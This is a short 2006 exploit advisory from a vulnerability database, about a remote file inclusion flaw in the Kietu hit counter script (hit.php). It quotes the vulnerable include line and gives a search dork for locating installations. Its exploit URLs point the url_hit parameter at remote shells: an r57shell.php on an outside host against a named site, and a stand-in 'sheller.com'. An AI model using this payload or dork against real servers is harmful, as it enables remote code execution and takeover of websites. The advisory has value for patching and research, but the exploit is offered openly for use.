Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14472
HistorySep 28, 2006 - 12:00 a.m.

Kietu? <= v4.0.0b2z (url_hit) Remote File Inclusion Exploit

2006-09-2800:00:00
vulners.com
60

#==============================================================================================
#Kietu? <= v4.0.0b2z (url_hit) Remote File Inclusion Exploit
#===============================================================================================

#Critical Level : Dangerous

#Download from : http://www.comscripts.com/jump.php?action=script&amp;id=958

#Version : 4.0.0b2

#================================================================================================

#Dork : "Kieto?"

#================================================================================================
#Bug in : hit.php

#Vlu Code :
#--------------------------------

include_once $url_hit.'class/kdetect.class.php';

example:http://www.kietu.net/files/kietuv4/hit.php?url_hit=http://d4wood.by.ru/r57shell.php?

#================================================================================================

#Exploit :
#--------------------------------

#http://sitename.com/[Script Path]/hit.php?url_hit=http://sheller.com?

#================================================================================================
#Discoverd By : D_7J

#Conatact : D_7J[at]yahoo[dot]com & D_7J[at]Deltahacking[dot]net

#Special Thx To : Str0ke
#Greetz:DeltahackingSecurityTEAM,Ashiyane,IHS,Simorgh,Shabgard,ICH,